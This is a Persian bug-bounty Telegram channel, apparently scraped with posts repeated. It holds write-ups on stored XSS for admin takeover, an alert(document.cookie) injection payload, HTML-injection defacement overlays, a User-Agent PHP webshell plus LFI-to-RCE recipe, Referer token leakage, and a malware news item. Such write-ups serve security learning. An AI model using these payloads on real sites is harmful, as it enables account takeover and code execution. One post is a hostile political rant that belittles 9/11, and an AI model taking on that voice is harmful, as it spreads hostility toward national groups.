خب دوستان اومدم با یه تجربه برگ ریزون دیگه از کار روی سایت ایرانی!
یه شرکتی روشون کار کردیم (بماندکه ادعا میکردن که ما خیلی امنیم) حدودا 5 تا باگ زدیم که از این 5 تا 3 تاش حیاتی بود 1 با سطح بسیار مهم و یکی هم مدیوم یا متوسط
آقا اینا سر مارو شیره مالیدن و کلا گفتن 20 تمن میدیم ( یه پیمنت پراسس زدم ازشون که قیمت خود اون 45 میلیون بود طبق تجربه بانتی های اخیر) بعد هیچی گفتیم باشه
گذشت و گذشت جنگ شد و اینا
بعد از جنگ گفتن آقا جنگه بزار دو تا قسط کنیم 20 میلیون رو دوتا 10 تمن بدیم
گفتیم باشه
بعد الان اومدن میگن به فکر اینیم که شرکت رو منحل کنیم و تعطیلش کنیم فعلا بیا 5 تمن بدیم بهتون تا ببینیم چطور میشه اوضاع 😐
روز به روز کار کردن روی وبسایت های ایرانی و توی ایران داره جالب تر و عجیب تر میشه
یعنی تو به یه هانتر خارجی بگی که من 5 تا باگ زدم از یه شرکت و بعد موقع بانتی دادن منحل شده شرکت به خدا اگر باورش شه 😑😑
آره دوستان باگ بزنید!
#تجربه
یه شرکتی روشون کار کردیم (بماندکه ادعا میکردن که ما خیلی امنیم) حدودا 5 تا باگ زدیم که از این 5 تا 3 تاش حیاتی بود 1 با سطح بسیار مهم و یکی هم مدیوم یا متوسط
آقا اینا سر مارو شیره مالیدن و کلا گفتن 20 تمن میدیم ( یه پیمنت پراسس زدم ازشون که قیمت خود اون 45 میلیون بود طبق تجربه بانتی های اخیر) بعد هیچی گفتیم باشه
گذشت و گذشت جنگ شد و اینا
بعد از جنگ گفتن آقا جنگه بزار دو تا قسط کنیم 20 میلیون رو دوتا 10 تمن بدیم
گفتیم باشه
بعد الان اومدن میگن به فکر اینیم که شرکت رو منحل کنیم و تعطیلش کنیم فعلا بیا 5 تمن بدیم بهتون تا ببینیم چطور میشه اوضاع 😐
روز به روز کار کردن روی وبسایت های ایرانی و توی ایران داره جالب تر و عجیب تر میشه
یعنی تو به یه هانتر خارجی بگی که من 5 تا باگ زدم از یه شرکت و بعد موقع بانتی دادن منحل شده شرکت به خدا اگر باورش شه 😑😑
آره دوستان باگ بزنید!
#تجربه
❤10
Life and Learning🎭
در آخرم وقتی اومد و ادمین دید این درخواست برای سرور من اومد! و اینجا اشک شوق داشتم میریختم (علکی)!
یه آسیب پذیری مشابه همین سطح حساسیت رو بهتون نشون میدم تا دقایقی دیگر!
❤3
Life and Learning🎭
تا حالا شنده بودین که یکی ادمین و منیجر رو تیک اور کنه؟ اره تایتلش اینه : Stored XSS Via Bypass File Upload Lead to Full Account Take Over Superlevel Users چطور حالا بهش میرسیم؟ من خودم چندین بار این آسیب پذیری رو زدم و تقریبا 80 درصدش توی تیکت ها بوده …
بعضی وقتا سایت یه سری اپشن داره که خیلی خاصن مثل قسمت تیکت ها ، چت با هم تیمی ، چت با سایر کاربران ، چت با ربات ، چت با هوش مصنوعی و .... که اگر آسیب پذیری در قسمت تیکت ها بزنی معمولا سطح خوبی میگیرن چون با ادمین ها هستش اکسپلویت شدنش ، یعنی مخرب بودنش بیشتر از تاثیر روی یه کاربر عادیه حالا یعنی چی؟ما توی تیکت ها میایم و یه سوال یا یه درخواستی رو مطرح میکنیم و میفرستیم برای ادمین مروبطه یا تحت شرایطی برای مدیریت و آنها این پیغام رو میبینند و در نهایت روی اون ریپلای میزنند و پاسخ درخور شمارو میدن!
حالا آسیب پذیریش کجاس؟ بیاین بهتون بگم
حالا آسیب پذیریش کجاس؟ بیاین بهتون بگم
👍6
در تیکت ها ما وقتی یه سوالی میپرسیم ، به یه حالت چت گونه ای پیغام ما توی صفحه HTML دیده میشه و در آنجا ذخیره میشه ! و همینطور هم از سمت ادمین هم همین اتفاق میوفته و پیغام ما برای ادمین نمایش داده میشه !
حالا اگر ما توی پیغاممون یه پیلود خطرناک که منجر به دزدیدن اکانت ادمین بشه بزاریم و بفرستیم چی میشه ؟ هیچ اکانت ادمین دستت میوفته و میتونی واردش بشی و سعی کنی سطح دسترسیت رو از طریق اپلود شل و .... بالا تر ببری
در اینجا منم همین کارو کردم اومدم بین پیغامم پیلود مخرب زدم که وقتی ادمین این پیام منو سین کرد سمتش یه اتفاقاتی بیوفته (که در این پیلود عمل خاصی اتفاق نمیوفته)
و و و حتی این پیلود من از سمت ادمین قابل رویت نیست ولی کار میکنه سمتش چرا؟ چون تگ اسکریپت مثل سایر تگ ها نیست که خروجیش دیده بشه و یا کدش دیده بشه برای همین دور از دید کاربر یا ادمین یا تارگت اعمال میشه!
و اینطوری ادمین رو تیک اور میکنن!!!!!!!!!!!!!
#باگ_بانتی | #رایتاپ
حالا اگر ما توی پیغاممون یه پیلود خطرناک که منجر به دزدیدن اکانت ادمین بشه بزاریم و بفرستیم چی میشه ؟ هیچ اکانت ادمین دستت میوفته و میتونی واردش بشی و سعی کنی سطح دسترسیت رو از طریق اپلود شل و .... بالا تر ببری
در اینجا منم همین کارو کردم اومدم بین پیغامم پیلود مخرب زدم که وقتی ادمین این پیام منو سین کرد سمتش یه اتفاقاتی بیوفته (که در این پیلود عمل خاصی اتفاق نمیوفته)
و و و حتی این پیلود من از سمت ادمین قابل رویت نیست ولی کار میکنه سمتش چرا؟ چون تگ اسکریپت مثل سایر تگ ها نیست که خروجیش دیده بشه و یا کدش دیده بشه برای همین دور از دید کاربر یا ادمین یا تارگت اعمال میشه!
و اینطوری ادمین رو تیک اور میکنن!!!!!!!!!!!!!
#باگ_بانتی | #رایتاپ
👏3👎1🤡1
خروجی کار هم به این صورت هستش که میتونید ببینید که پیغام به صورت عادی رفلکت شده
و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
#باگ_بانتی | #رایتاپ
و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
#باگ_بانتی | #رایتاپ
👍6
Life and Learning🎭
در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
همچینم آسیب پذیری قدیمی نیست که بگی پیدا نمیشه فقط باید دستت بیاد چطور تستش کنی و کجا تستش کنی!!!!!!
#باگ_بانتی | #رایتاپ
#باگ_بانتی | #رایتاپ
🔥6
در بعضی از سایت ها باید بشینین و تحلیل کنید که چطور با XSS میتونید برسید همیشه با پیلود های ساده نمیتونید دست پیدا کنید مثل این پیلود که خیلی عجیب و البته هوشمندانه بود !
#باگ_بانتی | #رایتاپ
https://example.com/?q=testsec'})});alert(document.cookie);$(function () { app.product.filter.init({ noscript: '#باگ_بانتی | #رایتاپ
🔥4❤1
بعضی وقتا شما یه HTML Injection کشف میکنید که میخواید از طریقش صفحه دیفیسی رو ترتیب بدید ولی نمیتونید ! پیلود زیر رو اول وارد میکنید
ولی نتیجه نمیگیرید و اتربیوت و تگ استایل رو برنامه نویس بسته ولی شما نباید تسلیم بشید ! امروزه اکثر وبسایت ها دارن از بوت استرپ استفاده میکنن شما میتونید از طریق بوت استرپ این کار رو انجام بدید و همان خروجی را دریافت کنید با پیلود زیر
و اینطوری بود که یه آسیب پذیری روی یه وبسایت معروف ایرانی به نام .... ثبت شد!
#باگ_بانتی | #رایتاپ
<div style='position: fixed; top: 0; left: 0; width: 100%; height: 100%;
background-color: rgba(0, 0, 0, 0.8); z-index: 9999;
display: flex; justify-content: center; align-items: center;
color: white; font-size: 2em; font-family: sans-serif;'>
تست آسیب پذیری در وبسایت هدف
</div>
ولی نتیجه نمیگیرید و اتربیوت و تگ استایل رو برنامه نویس بسته ولی شما نباید تسلیم بشید ! امروزه اکثر وبسایت ها دارن از بوت استرپ استفاده میکنن شما میتونید از طریق بوت استرپ این کار رو انجام بدید و همان خروجی را دریافت کنید با پیلود زیر
<div class='position-fixed top-0 start-0 w-100 h-100 d-flex justify-content-center align-items-center bg-dark bg-opacity-75 text-white fs-2' style='z-index: 9999;'>
تست آسیبپذیری در وبسایت
</div>
و اینطوری بود که یه آسیب پذیری روی یه وبسایت معروف ایرانی به نام .... ثبت شد!
#باگ_بانتی | #رایتاپ
❤6👍2😁1
تزریق لاگ سرور + LFI → RCE
1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره میکند.
2️⃣ مهاجم کد PHP را تزریق میکند:
User-Agent: <?php system($_GET['cmd']); ?>
3️⃣ فایل لاگ در root ذخیره میشود: /logs/access.log
4️⃣ اگر آسیبپذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id
Nullsecurityx
#باگ_بانتی | #رایتآپ
1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره میکند.
2️⃣ مهاجم کد PHP را تزریق میکند:
User-Agent: <?php system($_GET['cmd']); ?>
3️⃣ فایل لاگ در root ذخیره میشود: /logs/access.log
4️⃣ اگر آسیبپذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id
Nullsecurityx
#باگ_بانتی | #رایتآپ
❤6
پستی از استاد منصوری!
✨نشت توکن بازنشانی رمز عبور از طریق Referer
اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق میافته:
1. کاربر درخواست بازنشانی رمز عبور میکنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وبسایت میخواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیلتون (مثلاً v@mail.com) رو وارد میکنید و دکمه "ارسال" رو میزنید. وبسایت یه درخواست (POST) به سرورش میفرسته تا فرآیند بازنشانی شروع بشه.
2. وبسایت یه ایمیل با لینک بازنشانی میفرسته:
سرور وبسایت یه توکن (یه کد منحصربهفرد و موقت) تولید میکنه و یه لینک حاوی این توکن رو توی ایمیل براتون میفرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحهای ببره که بتونید رمز جدید وارد کنید.
3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک میکنید، مرورگرتون شما رو به صفحه بازنشانی رمز میبره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وبسایت دیگه (خارجی) بارگذاری میکنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وبسایت خارجی میفرسته.
🔅توی این درخواست، مرورگر بهطور خودکار آدرس صفحهای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer میفرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وبسایت خارجی نشت میکنه!
4. مهاجم به توکن دسترسی پیدا میکنه:
اگه اون وبسایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم میتونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم میتونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.
چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، میتونن حساب شما رو کنترل کنن.
#باگ_بانتی | #امنیت
✨نشت توکن بازنشانی رمز عبور از طریق Referer
اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق میافته:
1. کاربر درخواست بازنشانی رمز عبور میکنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وبسایت میخواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیلتون (مثلاً v@mail.com) رو وارد میکنید و دکمه "ارسال" رو میزنید. وبسایت یه درخواست (POST) به سرورش میفرسته تا فرآیند بازنشانی شروع بشه.
2. وبسایت یه ایمیل با لینک بازنشانی میفرسته:
سرور وبسایت یه توکن (یه کد منحصربهفرد و موقت) تولید میکنه و یه لینک حاوی این توکن رو توی ایمیل براتون میفرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحهای ببره که بتونید رمز جدید وارد کنید.
3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک میکنید، مرورگرتون شما رو به صفحه بازنشانی رمز میبره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وبسایت دیگه (خارجی) بارگذاری میکنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وبسایت خارجی میفرسته.
🔅توی این درخواست، مرورگر بهطور خودکار آدرس صفحهای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer میفرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وبسایت خارجی نشت میکنه!
4. مهاجم به توکن دسترسی پیدا میکنه:
اگه اون وبسایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم میتونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم میتونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.
چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، میتونن حساب شما رو کنترل کنن.
#باگ_بانتی | #امنیت
👍3❤1
Forwarded from World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده.
استفاده کنید ؛)
استفاده کنید ؛)
👎2
World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده. استفاده کنید ؛)
دوستان رایگان نشده عضویتش با ۵ دلار شده فکر کنم! تاریخش تموم شده دوستان!!!!
👍4👌1
Forwarded from 🕸 Articles
This media is not supported in your browser
VIEW IN TELEGRAM
مثل مجید باشیم.
جدیدا در یه سری از ابزار هایی که برای هانت استفاده میکردم اینو خیلی دیدم واقعا متاسفام برای دنیا و اروپا !
11 سپتامبر یه هواپیما رفت و برج دوقولو رو زد و یه عمره دارن براش عذاداری میکنن ولی اسراییل داره چندین دهس که فلسطین رو زیر تیر میگیره کلی بچه ناقص شدن ، خیلی از مادرا مفقود شدن بچه هاشون ، کنده شدن اعضای بدن خانواده هاشون رو دیدن ، و تنها کاری که اروپا میکنه و نشست های بین الملل میکنن چیه ؟ بازخواست؟ اونا بازخواست میکنن و اینم نمیره چندین ساله همینه روند و این واقعا باعث تاسفه
امیدوارم که اتفاقی که همه مسلمان ها و مسیحیان منتظرشن اتفاق بیوفته و حق اسراییل و امریکا داده بشه و امیدوارم یه ذره کشور های عربی مثل عربستان به فکر بیوفته که دیگه گاو شیر ده نیست و نفر بعدی بعد فلسطین اونه !!!! و امیدوارم که تموم بشه!
#مرگ_بر_ظالمان_زمانه
11 سپتامبر یه هواپیما رفت و برج دوقولو رو زد و یه عمره دارن براش عذاداری میکنن ولی اسراییل داره چندین دهس که فلسطین رو زیر تیر میگیره کلی بچه ناقص شدن ، خیلی از مادرا مفقود شدن بچه هاشون ، کنده شدن اعضای بدن خانواده هاشون رو دیدن ، و تنها کاری که اروپا میکنه و نشست های بین الملل میکنن چیه ؟ بازخواست؟ اونا بازخواست میکنن و اینم نمیره چندین ساله همینه روند و این واقعا باعث تاسفه
امیدوارم که اتفاقی که همه مسلمان ها و مسیحیان منتظرشن اتفاق بیوفته و حق اسراییل و امریکا داده بشه و امیدوارم یه ذره کشور های عربی مثل عربستان به فکر بیوفته که دیگه گاو شیر ده نیست و نفر بعدی بعد فلسطین اونه !!!! و امیدوارم که تموم بشه!
#مرگ_بر_ظالمان_زمانه
❤15🕊3🤡2👍1👏1
سایتهای پورنوگرافی از فایلهای آلوده .noscript به عنوان کلیکر استفاده میکنند : محققان Malwarebytes موج جدیدی از سوءاستفاده از پسوند .noscript را کشف کردهاند – این بار از دهها سایت پورنوگرافی – که از تصاویر آلوده برای فریب مرورگرهای کاربران جهت «لایک» کردن مخفیانه پستهای فیسبوک آنها استفاده میکنند.
این طرح به این صورت عمل میکند: به بازدیدکننده یک فایل .noscript نشان داده میشود و اگر روی تصویر کلیک کند، جاوااسکریپت به طور نامحسوس در مرورگر فعال میشود که یک «لایک» برای صفحه مورد نظر ایجاد میکند – البته به شرطی که کاربر یک حساب کاربری فیسبوک داشته باشد.
درون این فایلهای .noscript، کد بسیار مبهمی پنهان شده است که با استفاده از تکنیک اصلاحشدهی JSFuck که جاوااسکریپت را به «دیواری» آشفته از کاراکترها تبدیل میکند، پنهان شده است.
وقتی رمزگشایی میشود، مشخص میشود که اسکریپت زنجیرهی دیگری از کدهای مبهم و در نهایت، بدافزاری به نام Trojan.JS.Likejack را بارگذاری میکند. این بدافزار بدون اطلاع کاربر، به طور خودکار روی دکمهی «لایک» کلیک میکند.
Malwarebytes خاطرنشان میکند که تمام سایتهای شناساییشده توسط وردپرس پشتیبانی میشوند. فیسبوک (که در روسیه به عنوان یک شبکه افراطی شناخته شده و ممنوع است) به صورت دورهای چنین حسابها و صفحات جعلی را مسدود میکند، اما مدیران آنها به سرعت با پروفایلهای جدید بازمیگردند.
این اولین باری نیست که از .noscript سوءاستفاده میشود. مجرمان سایبری قبلاً از فایلهای SVG برای سرقت رمزهای عبور حسابهای گوگل و مایکروسافت استفاده کردهاند.
این طرح به این صورت عمل میکند: به بازدیدکننده یک فایل .noscript نشان داده میشود و اگر روی تصویر کلیک کند، جاوااسکریپت به طور نامحسوس در مرورگر فعال میشود که یک «لایک» برای صفحه مورد نظر ایجاد میکند – البته به شرطی که کاربر یک حساب کاربری فیسبوک داشته باشد.
درون این فایلهای .noscript، کد بسیار مبهمی پنهان شده است که با استفاده از تکنیک اصلاحشدهی JSFuck که جاوااسکریپت را به «دیواری» آشفته از کاراکترها تبدیل میکند، پنهان شده است.
وقتی رمزگشایی میشود، مشخص میشود که اسکریپت زنجیرهی دیگری از کدهای مبهم و در نهایت، بدافزاری به نام Trojan.JS.Likejack را بارگذاری میکند. این بدافزار بدون اطلاع کاربر، به طور خودکار روی دکمهی «لایک» کلیک میکند.
Malwarebytes خاطرنشان میکند که تمام سایتهای شناساییشده توسط وردپرس پشتیبانی میشوند. فیسبوک (که در روسیه به عنوان یک شبکه افراطی شناخته شده و ممنوع است) به صورت دورهای چنین حسابها و صفحات جعلی را مسدود میکند، اما مدیران آنها به سرعت با پروفایلهای جدید بازمیگردند.
این اولین باری نیست که از .noscript سوءاستفاده میشود. مجرمان سایبری قبلاً از فایلهای SVG برای سرقت رمزهای عبور حسابهای گوگل و مایکروسافت استفاده کردهاند.
🆒3
This media is not supported in your browser
VIEW IN TELEGRAM
حقیقتا اونا مرد تر بودن، متعهد تر بودن!
❤4👎1👌1